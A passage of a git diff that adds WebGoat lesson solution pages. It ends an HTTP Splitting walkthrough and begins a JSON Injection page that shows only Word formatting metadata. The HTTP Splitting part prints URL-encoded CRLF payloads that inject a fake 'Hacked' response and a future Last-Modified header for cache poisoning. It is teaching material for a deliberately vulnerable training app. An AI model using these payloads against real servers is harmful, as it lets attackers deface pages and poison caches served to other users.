+src="WebGoat/lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Second HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now inject
+for the language en%0d%0a%0d%0a%0d%0a<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_164"
+ o:spid="_x0000_i1033" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> First HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_165" o:spid="_x0000_i1032"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> First HTTP Response</p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The
+Content-Length: 0 will tell the server that the first request is over.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>A 200 OK
+message looks like this: HTTP/1.1 200 OK<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Lets see what
+you can do with: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
+</span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
+mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
+mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:
+Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/html&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_166"
+ o:spid="_x0000_i1031" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Splitting attack</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_167" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>8</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_168" o:spid="_x0000_i1029"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>9</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Second HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>10</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Second HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="WebGoat/lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>11</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Hacked!</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit the “Back”
+button of your browser.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="WebGoat/lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>12</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Stage 1 completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you know
+how to do HTTP Splitting. You can abuse this technique to do a cache poisoning
+attack.<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Cache
+poisoning requires manipulating the Last-Modified header. This must be changed
+to a date in the future.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
+</span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
+mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
+mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:
+Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/html&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_172" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="WebGoat/lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>13</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Inject cache poisoning</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/HttpSplitting_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpSplitting_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/filelist.xml b/main/project/WebContent/lesson_solutions/HttpSplitting_files/filelist.xml
new file mode 100644
index 000000000..8b4e1e66e
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpSplitting_files/filelist.xml
@@ -0,0 +1,34 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../HttpSplitting.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image029.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image030.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image031.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image032.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image033.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image034.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image035.jpg"/>
+ <o:File HRef="image015.png"/>
+ <o:File HRef="image036.jpg"/>
+ <o:File HRef="image017.png"/>
+ <o:File HRef="image037.jpg"/>
+ <o:File HRef="image019.png"/>
+ <o:File HRef="image038.jpg"/>
+ <o:File HRef="image021.png"/>
+ <o:File HRef="image039.jpg"/>
+ <o:File HRef="image023.png"/>
+ <o:File HRef="image040.jpg"/>
+ <o:File HRef="image025.png"/>
+ <o:File HRef="image041.jpg"/>
+ <o:File HRef="image027.png"/>
+ <o:File HRef="image042.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image001.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image001.png
new file mode 100644
index 000000000..a3cecc9aa
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image003.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image003.png
new file mode 100644
index 000000000..d62c55ea3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image005.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image005.png
new file mode 100644
index 000000000..4168195ac
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image007.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image007.png
new file mode 100644
index 000000000..d9f29ebed
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image009.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image009.png
new file mode 100644
index 000000000..c75a97ac6
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image011.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image011.png
new file mode 100644
index 000000000..addd9bce4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image013.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image013.png
new file mode 100644
index 000000000..4f70cbce7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image015.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image015.png
new file mode 100644
index 000000000..08c036f4e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image015.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image017.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image017.png
new file mode 100644
index 000000000..9dccc349f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image017.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image019.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image019.png
new file mode 100644
index 000000000..17708a3d7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image019.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image021.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image021.png
new file mode 100644
index 000000000..59bec4ece
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image021.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image023.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image023.png
new file mode 100644
index 000000000..8887f463b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image023.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image025.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image025.png
new file mode 100644
index 000000000..83279f010
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image025.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image027.png b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image027.png
new file mode 100644
index 000000000..ac9b0590f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image027.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image029.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image029.jpg
new file mode 100644
index 000000000..1f2923a0d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image029.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image030.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image030.jpg
new file mode 100644
index 000000000..5c309829a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image030.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image031.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image031.jpg
new file mode 100644
index 000000000..296995e6d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image031.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image032.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image032.jpg
new file mode 100644
index 000000000..04b19c12d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image032.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image033.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image033.jpg
new file mode 100644
index 000000000..1e20add5b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image033.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image034.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image034.jpg
new file mode 100644
index 000000000..cc30af047
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image034.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image035.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image035.jpg
new file mode 100644
index 000000000..0e01db1ea
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image035.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image036.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image036.jpg
new file mode 100644
index 000000000..51964a9bb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image036.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image037.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image037.jpg
new file mode 100644
index 000000000..9f8efcbb7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image037.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image038.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image038.jpg
new file mode 100644
index 000000000..036e50e47
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image038.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image039.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image039.jpg
new file mode 100644
index 000000000..81b54f365
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image039.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image040.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image040.jpg
new file mode 100644
index 000000000..caf41923a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image040.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image041.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image041.jpg
new file mode 100644
index 000000000..cd100cf63
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image041.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/image042.jpg b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image042.jpg
new file mode 100644
index 000000000..9a48ce5a4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/image042.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting_files/themedata.thmx b/main/project/WebContent/lesson_solutions/HttpSplitting_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpSplitting_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection.html b/main/project/WebContent/lesson_solutions/JSONInjection.html
new file mode 100644
index 000000000..49e2bac05
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JSONInjection.html
@@ -0,0 +1,805 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/JSONInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JSONInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>52</o:TotalTime>
+  <o:Created>2007-07-11T15:15:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>267</o:Words>
+  <o:Characters>1527</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>12</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1791</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/JSONInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/JSONInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
